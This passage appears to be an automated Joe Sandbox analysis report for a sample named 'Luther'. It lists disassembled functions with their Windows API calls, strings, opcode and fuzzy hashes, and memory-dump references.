Opcode Fuzzy Hash: 421114c4c612735f3cfcef8b9f6bfba91697e5bbb8d882e57950dc84de3c81dd
Instruction Fuzzy Hash: 1C21B572605219AF9F10DFA9CD88CBE73ACEB093647048435FA15EB2A0DA75DC478760

Function 00E98164 Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00E981A9
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00E981CF
SysAllocString.OLEAUT32(00000000), ref: 00E981D2
SysAllocString.OLEAUT32 ref: 00E981F3
SysFreeString.OLEAUT32 ref: 00E981FC
StringFromGUID2.OLE32(?,?,00000028), ref: 00E98216
SysAllocString.OLEAUT32(?), ref: 00E98224

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: a687b108fcae6c5191f7df8f123546aadabbf9c91cc84458efb4d5ae62e0e3be
Instruction ID: 75f3075344c46823012dc8f86f5e5f3461a92ba369b49cb08e194c5ad4face39
Opcode Fuzzy Hash: a687b108fcae6c5191f7df8f123546aadabbf9c91cc84458efb4d5ae62e0e3be
Instruction Fuzzy Hash: BC21B271604204AF9F149BA9ED88CAA77ECEB0A3247008135F915EB1B0DA70EC46C764

Function 00EA0E79 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 00EA0E99
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00EA0ED5

Strings

nul, xrefs: 00EA0F0E

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: fe9f1cde0f590736db06195fa5c11844fc5bc3126afedf36cacc4395c7b6c134
Instruction ID: 071e0ba23ee7dbfb32eaef6ccd36d31796a94e5b271890498027813bc8aa279b
Opcode Fuzzy Hash: fe9f1cde0f590736db06195fa5c11844fc5bc3126afedf36cacc4395c7b6c134
Instruction Fuzzy Hash: CB216075604309AFDB308F25DC04A9A77E8BF5A724F204A69FCA5FB2D0D772A841DB50

Function 00EA0F4E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00EA0F6D
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00EA0FA8

Strings

nul, xrefs: 00EA0FE0

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: a8b4cf942397b8e70eb8e2d92b5c53d6896d5e1fdfaf39ec1cd7376c8fe73d88
Instruction ID: 3433d2781c9fddd2218ad125dfc873a344402fa478d5d0c98c0d1500e63f4c38
Opcode Fuzzy Hash: a8b4cf942397b8e70eb8e2d92b5c53d6896d5e1fdfaf39ec1cd7376c8fe73d88
Instruction Fuzzy Hash: 4921F475604305DFDB308F298C44A9AB7E8BF5A324F200A28F8A1FB2D0D771A881CB50

Function 00EC4B4B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00E37873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00E378B1
Part of subcall function 00E37873: GetStockObject.GDI32(00000011), ref: 00E378C5
Part of subcall function 00E37873: SendMessageW.USER32(00000000,00000030,00000000), ref: 00E378CF

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00EC4BB0
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00EC4BBD
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00EC4BC8
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00EC4BD7
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00EC4BE3

Strings

Msctls_Progress32, xrefs: 00EC4B81

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: cb3af1b395f53a9324b6be6a1c011e5ba78def1fdc151321850e100fa6995196
Instruction ID: 0f674ca04d0e3cfc4aa7ceac4823fcb1fd41c12d134fe207c7eb2818156f06f2
Opcode Fuzzy Hash: cb3af1b395f53a9324b6be6a1c011e5ba78def1fdc151321850e100fa6995196
Instruction Fuzzy Hash: 2B11B6B614021DBEEF118F65CC85FE77FADEF08758F015111BA08A2090CA72DC21DBA0

Function 00E6DB5F Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00E6DB23: _free.LIBCMT ref: 00E6DB4C

_free.LIBCMT ref: 00E6DBAD

Part of subcall function 00E62D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00E6DB51,00F01DC4,00000000,00F01DC4,00000000,?,00E6DB78,00F01DC4,00000007,00F01DC4,?,00E6DF75,00F01DC4), ref: 00E62D4E
Part of subcall function 00E62D38: GetLastError.KERNEL32(00F01DC4,?,00E6DB51,00F01DC4,00000000,00F01DC4,00000000,?,00E6DB78,00F01DC4,00000007,00F01DC4,?,00E6DF75,00F01DC4,00F01DC4), ref: 00E62D60

_free.LIBCMT ref: 00E6DBB8
_free.LIBCMT ref: 00E6DBC3
_free.LIBCMT ref: 00E6DC17
_free.LIBCMT ref: 00E6DC22
_free.LIBCMT ref: 00E6DC2D
_free.LIBCMT ref: 00E6DC38

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 98b13fc91f4fe31fecb0273d364a71dd69e1171f55120a532e903f65f4669862
Instruction ID: f134a2716bc68874eb24c35a2f555a8c6638dc6ce4b668a18889be4cfea2f68f
Opcode Fuzzy Hash: 98b13fc91f4fe31fecb0273d364a71dd69e1171f55120a532e903f65f4669862
Instruction Fuzzy Hash: A1118E72AC5B04BAD620BBB0EC07FDB77DCAF15780F805C1DB299FA252DA74B5048650

Function 00E96078 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 00E9608D
_memcmp.LIBVCRUNTIME ref: 00E960AB
_memcmp.LIBVCRUNTIME ref: 00E960BE
_memcmp.LIBVCRUNTIME ref: 00E960D6
_memcmp.LIBVCRUNTIME ref: 00E960EE

Strings

j`, xrefs: 00E9609B

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: _memcmp
String ID: j`
API String ID: 2931989736-1521845545
Opcode ID: 6ecb404aed9a5af757d82a9431f485bb184e1a19c0313c74a4fe724ab3472ffc
Instruction ID: 2fe329fb47db411430eb49aaac4d822c5b4c402bb29ccd922aa3aff7560b8c1b
Opcode Fuzzy Hash: 6ecb404aed9a5af757d82a9431f485bb184e1a19c0313c74a4fe724ab3472ffc
Instruction Fuzzy Hash: 0E01F1E26043057BDA2056248CC2FAB739DDE0539DF042427FD0ABA341E721ED15C6A1

Function 00E9E30E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00E9E328
LoadStringW.USER32(00000000), ref: 00E9E32F
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00E9E345
LoadStringW.USER32(00000000), ref: 00E9E34C
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00E9E390

Strings

%s (%d) : ==> %s: %s %s, xrefs: 00E9E36D

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: HandleLoadModuleString$Message
String ID: %s (%d) : ==> %s: %s %s
API String ID: 4072794657-3128320259
Opcode ID: 6dd6878f2996caaef05661b6c508dab7d0b483f761d7b1d99b3d02271cb9ac55
Instruction ID: 88950131d490672d953dda3c54fa2cf4f3c44cbb73d85692e525efeef2ce963d
Opcode Fuzzy Hash: 6dd6878f2996caaef05661b6c508dab7d0b483f761d7b1d99b3d02271cb9ac55
Instruction Fuzzy Hash: 940162F2904208BFE711D7A4CD89EE6776CDB08344F0045B1B745F6041E6769E898B75

Function 00EA1312 Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 00EA1322
EnterCriticalSection.KERNEL32(00000000,?), ref: 00EA1334
TerminateThread.KERNEL32(00000000,000001F6), ref: 00EA1342
WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00EA1350
CloseHandle.KERNEL32(00000000), ref: 00EA135F
InterlockedExchange.KERNEL32(?,000001F6), ref: 00EA136F
LeaveCriticalSection.KERNEL32(00000000), ref: 00EA1376

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: 3138cca579b45824bbb1df862ccefbcd4e6653cf51303b403a47608f85747bac
Instruction ID: beeb94e275da4d2a71c482a1091a3bb18afb7119821e4b2460c2b8929d6608ce
Opcode Fuzzy Hash: 3138cca579b45824bbb1df862ccefbcd4e6653cf51303b403a47608f85747bac
Instruction Fuzzy Hash: 7FF0C932046612AFD7455F55EE49FDABB39FF05306F402131F102A58B08776A46ACF90

Function 00EB26BD Relevance: 9.3, APIs: 6, Instructions: 298networkCOMMON

Download Yara Rule

APIs

__WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00EB281D
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00EB283E
WSAGetLastError.WSOCK32 ref: 00EB284F
htons.WSOCK32(?,?,?,?,?), ref: 00EB2938
inet_ntoa.WSOCK32(?), ref: 00EB28E9

Part of subcall function 00E9433E: _strlen.LIBCMT ref: 00E94348

Part of subcall function 00EB3C81: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,00EAF669), ref: 00EB3C9D

_strlen.LIBCMT ref: 00EB2992

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
String ID:
API String ID: 3203458085-0
Opcode ID: d4ab3e7e6bda862d21c449d2b20e6074434270a4ee836a0f3c22c6c90a561563
Instruction ID: 079d4f86e7bca70ea1c03d4493f537525a28d8c59d5f1b5769db2a58971f3d42
Opcode Fuzzy Hash: d4ab3e7e6bda862d21c449d2b20e6074434270a4ee836a0f3c22c6c90a561563
Instruction Fuzzy Hash: F0B10431604300AFD324DF24C885F6BBBE5AF84318F54A95CF5566B2A2DB31ED46CB91

Function 00E60527 Relevance: 9.3, APIs: 6, Instructions: 269COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 00E6042A
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E60446
__allrem.LIBCMT ref: 00E6045D
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E6047B
__allrem.LIBCMT ref: 00E60492
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E604B0

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 1992179935-0
Opcode ID: f879b393e65d4db2631db90962c4ab5633f4520d067d5efed2ccc62c0ef88ee5
Instruction ID: e6f2f5a93584d344321c85d3f745032591f7179a658ae488e902f68902dba587
Opcode Fuzzy Hash: f879b393e65d4db2631db90962c4ab5633f4520d067d5efed2ccc62c0ef88ee5
Instruction Fuzzy Hash: 7281F8716C07269BD720AE68EC85B6B73E9EF543A4F24652EF521F72C1EB70D9008790

Function 00E66571 Relevance: 9.2, APIs: 6, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00E58649,00E58649,?,?,?,00E667C2,00000001,00000001,00000000), ref: 00E665CB
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00E667C2,00000001,00000001,00000000,?,?,?), ref: 00E66651
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00E6674B
__freea.LIBCMT ref: 00E66758

Part of subcall function 00E63B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00E56A79,?,0000015D,?,?,?,?,00E585B0,000000FF,00000000,?,?), ref: 00E63BC5

__freea.LIBCMT ref: 00E66761
__freea.LIBCMT ref: 00E66786

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: c2c87f60e73cc01f9ce410ded80d3ffd064bfb198d9ef2b56daeef26d4c290aa
Instruction ID: a6ccb5ef0a4257aaa53211e71db8ba2d8cc7710cd4ab2d43341c169649b2157c
Opcode Fuzzy Hash: c2c87f60e73cc01f9ce410ded80d3ffd064bfb198d9ef2b56daeef26d4c290aa
Instruction Fuzzy Hash: 76511972660206AFDB258F64EC45EBF77AAEB40798F14566AFC04F6140EB35EC50C690

Function 00EBC63B Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00E3B329: _wcslen.LIBCMT ref: 00E3B333

Part of subcall function 00EBD3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00EBC10E,?,?), ref: 00EBD415
Part of subcall function 00EBD3F8: _wcslen.LIBCMT ref: 00EBD451
Part of subcall function 00EBD3F8: _wcslen.LIBCMT ref: 00EBD4C8
Part of subcall function 00EBD3F8: _wcslen.LIBCMT ref: 00EBD4FE

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00EBC72A
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00EBC785
RegCloseKey.ADVAPI32(00000000), ref: 00EBC7CA
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00EBC7F9
RegCloseKey.ADVAPI32(?,?,00000000), ref: 00EBC853
RegCloseKey.ADVAPI32(?), ref: 00EBC85F

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
String ID:
API String ID: 1120388591-0
Opcode ID: 4a15b92ef1eb8f6431816d51f65e8e9e250a3abd2e3f7013fabeb27c6b17aeb8
Instruction ID: a1fe7485a652498e939eda17464197c6c7756a5d14aed4560c0a8a57a95597af
Opcode Fuzzy Hash: 4a15b92ef1eb8f6431816d51f65e8e9e250a3abd2e3f7013fabeb27c6b17aeb8
Instruction Fuzzy Hash: 0981A071208241AFC714DF24C885E6BBBE5FF84308F14946DF5596B2A2DB32ED06CB92

Function 00E9009D Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000035), ref: 00E900A9
SysAllocString.OLEAUT32(00000000), ref: 00E90150
VariantCopy.OLEAUT32(00E90354,00000000), ref: 00E90179
VariantClear.OLEAUT32(00E90354), ref: 00E9019D
VariantCopy.OLEAUT32(00E90354,00000000), ref: 00E901A1
VariantClear.OLEAUT32(?), ref: 00E901AB

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: Variant$ClearCopy$AllocInitString
String ID:
API String ID: 3859894641-0
Opcode ID: 0d9fdde4c23c7dcb3b6b292afdf3e7232d93dfeaf1e3d6be703788d827bdbaed
Instruction ID: 384269f535c3d3c9e167c98a896b3dccb7df6912b23483b6748b95f745e63010
Opcode Fuzzy Hash: 0d9fdde4c23c7dcb3b6b292afdf3e7232d93dfeaf1e3d6be703788d827bdbaed
Instruction Fuzzy Hash: B451D631600310AECF24AB659889B69B3E5EF45310F64B857F906FF2A7DB709C44CB96

Function 00EA9B51 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 383COMMON

Download Yara Rule

APIs

Part of subcall function 00E341EA: _wcslen.LIBCMT ref: 00E341EF

Part of subcall function 00E38577: _wcslen.LIBCMT ref: 00E3858A

GetOpenFileNameW.COMDLG32(00000058), ref: 00EA9F2A
_wcslen.LIBCMT ref: 00EA9F4B
_wcslen.LIBCMT ref: 00EA9F72
GetSaveFileNameW.COMDLG32(00000058), ref: 00EA9FCA

Strings

X, xrefs: 00EA9E57

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: _wcslen$FileName$OpenSave
String ID: X
API String ID: 83654149-3081909835
Opcode ID: 5add0aa45d4b7926d5981e41ad77a5c312872f622bded84952a9f80834675606
Instruction ID: c9f4e8d4d73f537d681cde6192eccc2411ba9f34878eefafb259457eb5f1085d
Opcode Fuzzy Hash: 5add0aa45d4b7926d5981e41ad77a5c312872f622bded84952a9f80834675606
Instruction Fuzzy Hash: C7E194316043409FC714DF24C885B6ABBE1BF89314F14996DF989AB2A2DB31ED45CB92

Function 00EA6ED3 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00EA6F21
CoInitialize.OLE32(00000000), ref: 00EA707E
CoCreateInstance.OLE32(00ED0CC4,00000000,00000001,00ED0B34,?), ref: 00EA7095
CoUninitialize.OLE32 ref: 00EA7319

Strings

.lnk, xrefs: 00EA6EFF, 00EA6F69, 00EA7025

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_wcslen
String ID: .lnk
API String ID: 886957087-24824748
Opcode ID: 0389c9534edfea3fe55514bc0964c1662ff1b77efd36bb1a30c204ad4d756c29
Instruction ID: 8901b49d434f1bdaf00cd2aa7e978ea0de252833c88dc8c0529b668befea0992
Opcode Fuzzy Hash: 0389c9534edfea3fe55514bc0964c1662ff1b77efd36bb1a30c204ad4d756c29
Instruction Fuzzy Hash: A2D14A71608301AFC304EF24C885E6BBBE8FF99708F40596DF585AB261DB71E905CB92

Function 00EA1196 Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 00EA11B3
ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00EA11EE
EnterCriticalSection.KERNEL32(?), ref: 00EA120A
LeaveCriticalSection.KERNEL32(?), ref: 00EA1283
ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 00EA129A
InterlockedExchange.KERNEL32(?,000001F6), ref: 00EA12C8

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
